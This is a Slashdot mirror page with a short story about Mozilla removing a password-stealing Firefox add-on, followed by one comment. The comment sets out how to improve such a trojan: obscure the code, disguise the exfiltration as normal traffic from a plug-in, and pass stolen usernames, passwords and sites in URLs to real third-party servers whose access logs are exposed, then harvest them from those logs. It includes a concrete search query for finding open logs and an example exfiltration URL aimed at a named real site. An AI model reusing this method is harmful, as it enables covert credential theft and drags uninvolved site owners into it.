Slashdot Mirror


How the Mozilla Sniffer Backdoor Was Discovered

An anonymous reader writes "Mozilla pulled one of their Firefox add-ons earlier this week for containing a backdoor which stole passwords from its users. Netcraft has taken a closer look at how the rogue extension worked, and how it was discovered by chance rather than through any code review process. Mozilla are working on a new security model to stop this kind of backdoor happening again."

1 of 201 comments (clear)

  1. To perfect this hack... by Chapter80 · · Score: 5, Interesting

    When writing Trojans like this, there are several considerations that this author failed on.

    1) Obscuring the code, so that it lasts longer, even upon scrutiny of the source.
    2) Obscuring the password delivery mechanism to reduce the likelihood of detection of the code execution.
    3) Obscure the password retrieval, to reduce the likelihood that the perpetrator would be caught, even if the authorities discover the code.

    Much has been written about item 1, obscuring code. But I haven't seen much research describing items 2 or 3.
    If I were writing the code, I would integrate the password theft and remote delivery into the main purpose of the code. For instance, say you wrote a plug-in whose function was to report to the user some information retrieved from Google and other sites. e.g. "This plug-in helps with Search Engine Optimization, by reporting potential keywords that can be added to the web page to increase results". With that sort of purpose, hits to Google and other sites wouldn't be suspected.

    Some of my hits to Google would be to locate an open log file, with a Google Query like this query: "get / http/1.1" 200 mozilla filetype:log

    Once I found a web server with a log file that was openly being displayed on the web, I'd pass the stolen information (stolen user name, stolen password, and site that this information can be used on) in the form of a URL, possibly encoding the payload information (I don't encode it below, for clarity).

    Then my rouge program would request a few more pages from other sites that have open log files, just to obscure my activities, specifically requesting the log file page itself (and disposing of the results). I'll explain why this step is important later...

    Example: Using my Google query above, I can see that bullyentertainment.com has its logfile exposed (sorry, bullyentertainment, you're just the first one on my list of hundreds of thousands of open logfiles). That means that my trojan horse can request a page on bullyentertainment.com, (like www.bullyentertainment.com/stolen_info?user=myuser&pwd=hunter2&site=gmail.com it will log my hit into that file - logging the stolen user name, password, and site information into a remote innocent bystander server. If my rouge program requests a page on bullyentertainment.com with some information encoded in the URL, I can effectively transfer the secret stolen information from the infected PC to an innocent bystander (bullyentertainment.com).

    Then later, back at secret spy headquarters, I can use the same Google Query to locate log files that have my secret information in them, like www.bullyentertainment.com/logs/access.log which was a log file shown by my Google Query. I can follow the same pattern as the infected PC - first hit a page passing some URL containing secret information, and then retrieve the log file - so my activities ALSO look like an infected PC. But by retrieving the log file, I have retrieved all of the stolen passwords.

    This technique is a way to pass stolen information back to the hacker without detection, by going through an intermediary. Because spy headquarters uses the same procedure as a hacked PC, it cannot easily be detected as the destination of the information. Use of proxies can further hinder attempts to catch the hacker. In a real hack, I'd encode the secret information, so that only I was able to easily decode it. But you get the idea.

    PS If you test the above links, no harm, but your IP address will be logged (just as it is with any click), but it will be visible to other users on an exposed log file. No big deal, but I thought I'd mention it.